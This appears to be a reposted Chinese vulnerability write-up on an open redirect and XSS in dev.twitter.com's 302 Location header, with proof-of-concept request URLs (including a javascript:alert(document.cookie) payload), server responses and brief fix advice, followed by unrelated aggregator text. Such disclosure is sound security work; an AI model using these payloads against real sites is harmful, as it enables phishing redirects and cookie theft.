[twitter]关于HTTP头部的重定向漏洞与XSS漏洞
Posted 挑战自我安全社区
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[twitter]关于HTTP头部的重定向漏洞与XSS漏洞相关的知识,希望对你有一定的参考价值。
1、漏洞简介
这个漏洞发生在请求的链接中,需要用户的交互点击,是由点击的请求链接传递给302页面的location值,从而导致的漏洞
2、漏洞证明
2.1、重定向漏洞
首先请求如下链接:
https://dev.twitter.com/https:/%5cblackfan.ru/
然后http会做出如下响应:
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru
这就导致了重定向漏洞,影响的浏览器包括:Chrome, FireFox, Opera
2.2、XSS漏洞
首先请求如下链接:
https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
然后http会做出如下响应:
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...
<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>. If not click the link.
如下图所示:
3、修复建议
一是通过在链接中的Location值中创建一个不正确的端口,这样可以阻止火狐浏览器的重定向漏洞;
二是在链接的跳转中,对相关的链接进行严格过滤。
以上是关于[twitter]关于HTTP头部的重定向漏洞与XSS漏洞的主要内容,如果未能解决你的问题,请参考以下文章
出现错误:redirect_uri_mismatch 请求中的重定向 URI:http://localhost:8080/oauth2callback 与注册的重定向 URI 不匹配